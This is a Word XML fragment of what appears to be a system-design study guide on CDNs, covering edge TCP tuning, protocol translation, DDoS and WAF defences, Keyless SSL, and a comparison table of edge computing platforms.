    <w:p w14:paraId="12FC58DE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN edge servers use optimized TCP settings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E9E6D5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Increased initial congestion window (IW10 or higher) — more data in first RTT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29495D56" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>BBR congestion control — better bandwidth utilization, lower latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E6BB4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>TCP Fast Open — data in SYN packet on reconnection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6D2D3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>These optimizations are applied between CDN and user (the "last mile" where they matter most).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E92BB00" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>The connection between CDN and origin uses the optimized private backbone (pre-warmed, high BDP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CBA61" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol downgrade handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F26EABD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Client supports HTTP/3 → CDN serves over QUIC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230823C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>But origin only supports HTTP/1.1 → CDN translates (HTTP/3 client ↔ CDN ↔ HTTP/1.1 origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51A8AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Users get the latest protocol benefits without origin changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C06901" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="71F7EAE0">
          <v:rect id="_x0000_i4689" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589571A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. CDN Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF7781" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 DDoS Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F881C0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why CDN is a natural DDoS defense:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396A68D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Massive distributed capacity (100+ Tbps) absorbs volumetric attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580362F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Anycast distributes attack traffic across ALL PoPs (no single target).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AB5D12" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge filtering: malicious traffic is dropped at the edge, never reaches origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E7DFE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 3/4 DDoS mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D435E4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>SYN flood: Edge uses SYN cookies (stateless handshake under attack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2443A4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>UDP amplification: Rate-limit/drop known amplification patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D43E649" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Volumetric: Absorb with massive capacity (CDN has 100x more bandwidth than any attacker).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E6542A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Layer 7 DDoS mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F379A55" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP flood: Rate limiting per IP, per path, per pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4328AF3B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Bot detection: JavaScript challenges, CAPTCHAs, behavioral analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD74A1F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Reputation scoring: known bad IPs get stricter treatment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00433905" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The origin remains hidden:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF194F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin IP is never exposed to the public (only CDN IPs are in DNS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AAB0C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Even if attacker knows the origin IP, the CDN can block direct origin access (origin only accepts connections from CDN IPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574CE303" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 WAF (Web Application Firewall) at the Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BADDBAF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CDN WAF works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D18A24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Every request passes through security rules BEFORE hitting cache or origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD3814" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D4F86" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>User request → [WAF rules engine] → [Cache lookup] → [Origin (if miss)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0B5FA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rules check for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7981F9AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>SQL injection patterns in query parameters/body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A547B74" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>XSS payloads in user input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610D2B3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Path traversal attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E701AC2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Known CVE exploit patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF5660" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Bot signatures (headless browsers, automation tools).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506168CE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Rate anomalies (too many requests from single IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FE8F10" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantage of WAF at CDN:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Attacks are blocked at the edge (closest to the attacker), never consuming origin resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C325B1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 TLS at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3489B8B7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN handles TLS for millions of domains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22800DEA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Shared certificates (SAN/SNI): one certificate covers multiple customer domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A27DC9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Dedicated certificates: customer-specific certificate (higher trust, required for EV).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C04F33" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Let's Encrypt automation: CDN auto-provisions certificates for all customer domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAB46CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>TLS termination: CDN handles all crypto (origin can be HTTP internally).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7CFD5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keyless SSL (Cloudflare innovation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627D0268" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Problem: Customer doesn't want CDN to have their private key (compliance, trust).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D23C6D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6509F9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN handles TLS handshake normally EXCEPT the private key operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C7058" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>For the RSA/ECDSA signature step, CDN sends the data-to-sign to the customer's key server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AEC679" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Customer's server signs with their private key, returns signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2400D604" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN completes the handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1F2AEC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Private key never leaves customer's infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE86E8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cost: 1 extra round-trip during handshake (to customer's key server). Amortized by session resumption (subsequent connections don't need the private key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A770E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="4EFA8557">
          <v:rect id="_x0000_i4690" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC628D4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. CDN for Dynamic Content and Edge Computing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69193790" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Edge Computing — Running Code at CDN PoPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07757465" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The evolution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> CDN edges are no longer just cache servers — they're compute nodes.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263"/>
        <w:gridCol w:w="1718"/>
        <w:gridCol w:w="1549"/>
        <w:gridCol w:w="1959"/>
        <w:gridCol w:w="1861"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="1F25943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FEFB71" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Platform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00F318" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Runtime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7ABFC7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Startup 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1C09E3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Execution Limit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B42613" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Deploy Globally</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="7E2C732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B42911" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Cloudflare Workers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9873A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>V8 Isolates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98A41C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>&lt; 5ms cold start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DC77A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>30s CPU (50ms wall for free)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E60A77" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>300+ PoPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="2C3B4A3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4AD685" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>AWS Lambda@Edge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147212" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Node.js, Python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6920DD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>50–200ms cold start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1E8FBC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>30s (viewer) / 30s (origin)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7CE3C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>450+ CloudFront PoPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
